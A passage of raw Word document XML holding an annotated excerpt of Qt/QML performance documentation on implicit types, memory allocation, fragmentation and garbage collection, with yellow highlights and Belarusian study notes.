          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</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r3</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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r4</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>each have custom properties and are each considered to be different (</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>implicit</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) types. Note that</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r3</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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r4</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">are each considered to </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>be of different types</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, even though they have identical property information, simply because the custom property was not declared in the component which they are instances of.</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If</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r3</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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r4</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>were both instances of a</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RectangleWithString</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>component, and that component definition included the declaration of a string property named</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customProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, then</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r3</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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r4</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>would be considered to be the same type (that is, they would be instances of the</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RectangleWithString</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type, rather than defining their own </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>implicit type</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00464C58">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1075" w:name="in-depth-memory-allocation-consideration"/>
      <w:bookmarkStart w:id="1076" w:name="_Toc483000758"/>
      <w:bookmarkStart w:id="1077" w:name="_Toc483003761"/>
      <w:bookmarkStart w:id="1078" w:name="_Toc483604110"/>
      <w:bookmarkStart w:id="1079" w:name="_Toc483605330"/>
      <w:bookmarkEnd w:id="1075"/>
      <w:r w:rsidRPr="00464C58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In-Depth Memory Allocation Considerations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1076"/>
      <w:bookmarkEnd w:id="1077"/>
      <w:bookmarkEnd w:id="1078"/>
      <w:bookmarkEnd w:id="1079"/>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="007C1341" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Whenever making decisions regarding memory allocation or performance trade-offs, it is important to keep in mind the impact of CPU-cache performance, operating system paging, and JavaScript engine garbage collection</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Potential solutions should be </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>benchmarked carefully in order to ensure that the best one is selected</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00464C58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00464C58" w:rsidRPr="00464C58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>лепей зразумець кожны з гэтых трох момантаў</w:t>
      </w:r>
      <w:r w:rsidR="00464C58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00464C58" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>No set of general guidelines can replace a solid understanding of the underlying principles of computer science combined with a practical knowledge of the implementation details of the platform for which the application developer is developing</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00464C58" w:rsidRPr="00464C58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="007C1341" w:rsidRPr="00464C58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>кваліфікацыя распрацоўшчыка праграмнага забеспячэння</w:t>
      </w:r>
      <w:r w:rsidR="00464C58" w:rsidRPr="00464C58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r w:rsidR="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no amount of theoretical calculation can replace a good set of benchmarks and analysis tools when making trade-off decisions</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00464C58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00464C58" w:rsidRPr="00464C58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="007C1341" w:rsidRPr="00464C58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>эмпірызм у праектаванні праграмных сістэм</w:t>
      </w:r>
      <w:r w:rsidR="00464C58" w:rsidRPr="00464C58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="006B68B8">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1080" w:name="fragmentation"/>
      <w:bookmarkStart w:id="1081" w:name="_Toc483000759"/>
      <w:bookmarkStart w:id="1082" w:name="_Toc483604111"/>
      <w:bookmarkStart w:id="1083" w:name="_Toc483605331"/>
      <w:bookmarkEnd w:id="1080"/>
      <w:r w:rsidRPr="00464C58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fragmentation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1081"/>
      <w:bookmarkEnd w:id="1082"/>
      <w:bookmarkEnd w:id="1083"/>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B57CA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fragmentation is a C++ development issue. If the application developer is not defining any C++ types or plugins, they may safely ignore this section.</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Over time, </w:t>
      </w:r>
      <w:r w:rsidRPr="006B68B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an application will all</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57CA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ocate large portions of memory</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57CA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>write data to that memory</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57CA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subsequently free some portions of that memory once it has finished using some of the data</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57CA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can result in "free" memory being located in non-contiguous chunks, which cannot be returned to the operating system for other applications to use</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57CA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It also has an impact on the caching and access characteristics of the application, as the "living" data may be spread across many different pages of physical memory</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57CA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This in turn could force the operating system to swap which can cause filesystem I/O - which is, comparatively speaking, an extremely slow operation</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00B57CA5" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B57CA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fragmentation can be avoided by utilizing pool allocators (and other contiguous memory allocators), by reducing the amount of memory which is allocated at any one time by carefully managing object lifetimes, by periodically cleansing and rebuilding caches, or by utilizing a memory-managed runtime with garbage collection (such as JavaScript)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B57CA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B68B8" w:rsidRPr="006B68B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00B57CA5" w:rsidRPr="006B68B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Фрагментацыя як важная праблема праграміравання.</w:t>
      </w:r>
      <w:r w:rsidR="006B68B8" w:rsidRPr="006B68B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> Прызначэнне пулаў. </w:t>
      </w:r>
      <w:r w:rsidR="006B68B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Пранікнуць у праблему глыбей</w:t>
      </w:r>
      <w:r w:rsidR="006B68B8" w:rsidRPr="006B68B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00BD1D40" w:rsidRDefault="005D1E34" w:rsidP="006B68B8">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1084" w:name="garbage-collection"/>
      <w:bookmarkStart w:id="1085" w:name="_Toc483000760"/>
      <w:bookmarkStart w:id="1086" w:name="_Toc483604112"/>
      <w:bookmarkStart w:id="1087" w:name="_Toc483605332"/>
      <w:bookmarkEnd w:id="1084"/>
      <w:r w:rsidRPr="006B68B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Garbage</w:t>
      </w:r>
      <w:r w:rsidRPr="006B68B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006B68B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Collection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1085"/>
      <w:bookmarkEnd w:id="1086"/>
      <w:bookmarkEnd w:id="1087"/>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211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1D40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
